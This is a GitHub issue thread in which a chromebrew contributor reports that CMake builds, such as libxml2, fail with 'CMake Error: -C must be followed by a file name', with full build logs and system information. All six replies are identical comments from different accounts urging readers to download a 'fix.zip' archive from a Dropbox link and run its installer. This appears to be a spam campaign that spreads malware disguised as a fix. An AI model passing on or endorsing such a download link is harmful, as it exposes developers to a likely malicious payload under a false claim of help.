### ISSUE TITLE
Unable to build CMake packages

### ISSUE THREAD

**Issue by Zopolis4** [chromebrew/chromebrew#10359]
**Describe the bug**
The cmake buildsystem was broken by #10335.

**To Reproduce**

1. Please indicate where the command(s) were executed.

`satmandu/crewbuild:m90-x86_64` container

2. I executed the command(s) below:
      ```shell
      crew reinstall -s libxml2
      ```

      Output:

      ```
      libxml2: Libxml2 is the XML C parser and toolkit developed for the Gnome project.
      Performing pre-flight checks...
      Downloading source...
      Cannot find cached git repository. 😔 Will download.
      Initialized empty Git repository in /usr/local/tmp/crew/libxml2.20240826002845.dir/.git/
      remote: Enumerating objects: 3452, done.
      remote: Counting objects: 100% (3452/3452), done.
      remote: Compressing objects: 100% (2167/2167), done.
      remote: Total 3452 (delta 865), reused 2850 (delta 707), pack-reused 0 (from 0)
      Receiving objects: 100% (3452/3452), 3.39 MiB | 2.74 MiB/s, done.
      Resolving deltas: 100% (865/865), done.
      From https://gitlab.gnome.org/GNOME/libxml2
       * tag               v2.13.3    -> FETCH_HEAD
      HEAD is now at 3b1742b Release v2.13.3
      Repository downloaded.
      Caching downloaded git repo...
      Git repo cached.
      Building from source, this may take a while...
      Additional cmake_options being used: <no pre_cmake_options> -DLIBXML2_WITH_PYTHON=OFF \
          -DLIBXML2_WITH_LZMA=OFF \
          -DLIBXML2_WITH_ICU=ON
      CMake Error: -C must be followed by a file name.
      CMake Error: Run 'cmake --help' for all supported options.
      Command "bash -c  mold -run cmake -C  -B builddir -G Ninja -DCMAKE_INSTALL_PREFIX=/usr/local -DCMAKE_LIBRARY_PATH=/usr/local/lib64 -DCMAKE_C_FLAGS='-O2 -pipe -ffat-lto-objects -fPIC   -flto=auto' -DCMAKE_CXX_FLAGS='-O2 -pipe -ffat-lto-objects -fPIC   -flto=auto' -DCMAKE_EXE_LINKER_FLAGS='-flto=auto ' -DCMAKE_LINKER_TYPE=MOLD -DCMAKE_SHARED_LINKER_FLAGS='-flto=auto ' -DCMAKE_MODULE_LINKER_FLAGS='-flto=auto ' -DCMAKE_INTERPROCEDURAL_OPTIMIZATION=TRUE -DCMAKE_BUILD_TYPE=Release -DLIBXML2_WITH_PYTHON=OFF \
          -DLIBXML2_WITH_LZMA=OFF \
          -DLIBXML2_WITH_ICU=ON" failed, retrying with "-j1"...
      CMake Error: -C must be followed by a file name.
      CMake Error: Run 'cmake --help' for all supported options.
      There was a build error.
      ```
**Expected behavior**
The build to work successfully

**System Information: Paste the output of `crew sysinfo -v` between the two `***` below.**
**If you cannot execute `crew`, display the output of `cat /etc/lsb-release` instead.**

***
/usr/local/bin/crew:1843:<main>:The last update was 3 min, 35 seconds ago.
<details><summary>Expand</summary>

- Architecture: `x86_64` (`x86_64`)
- Processor vendor: `GenuineIntel`
- User space: `64-bit`
- Chromebrew Kernel version: `5.10`
- Chromebrew Running in Container: `true`

- Chromebrew version: `1.51.1`
- Chromebrew prefix: `/usr/local`
- Chromebrew libdir: `/usr/local/lib64`

- Last update in local repository: 8bf154910 `Fix repology workflow again by installing highline (#10354) (20 hours ago)`

- OS variant: `Chrome OS`
- OS version: `nocturne-release/R90-13816.82.0`
- OS channel: `stable-channel`

</details>

***

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
